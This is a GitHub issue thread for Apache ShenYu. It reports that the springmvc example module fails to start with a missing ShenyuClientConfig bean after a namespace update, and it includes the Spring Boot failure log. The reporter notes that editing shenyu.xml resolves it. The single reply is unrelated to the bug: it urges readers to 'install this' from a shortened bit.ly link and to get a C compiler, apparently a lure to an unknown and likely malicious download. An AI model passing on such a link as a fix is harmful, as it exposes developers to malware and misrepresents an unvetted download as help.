### ISSUE TITLE
[BUG] <Can not startup shenyu-examples-springmvc>

### ISSUE THREAD

**Issue by Wweiei** [apache/shenyu#5661]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

After updating SpringMvcClientEventListener with namespace support on September 5, 2024, the shenyu-examples-springmvc module fails to start. The shenyu.xml file also needs to be updated.

### Expected Behavior

The application should start successfully. And the selectors and rules or metadatas register successfully.

### Steps To Reproduce

1.check out to master branch and pull the lastest code.
2.Try to run the shenyu-examples-springmvc module.

### Environment

```markdown
ShenYu version(s):branch master latest
```

### Debug logs

2024-09-19T18:05:23.907+08:00 ERROR 17764 --- [           main] o.s.b.d.LoggingFailureAnalysisReporter   : 

***************************
APPLICATION FAILED TO START
***************************

Description:

Parameter 0 of constructor in org.apache.shenyu.client.springmvc.init.SpringMvcClientEventListener required a bean of type 'org.apache.shenyu.register.common.config.ShenyuClientConfig' that could not be found.

Action:

Consider defining a bean of type 'org.apache.shenyu.register.common.config.ShenyuClientConfig' in your configuration.

### Anything else?

After updating the dependency injection code for SpringMvcClientEventListener in shenyu.xml, the application starts successfully.

**Comment by odoyhaha** [comment]
install this
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)
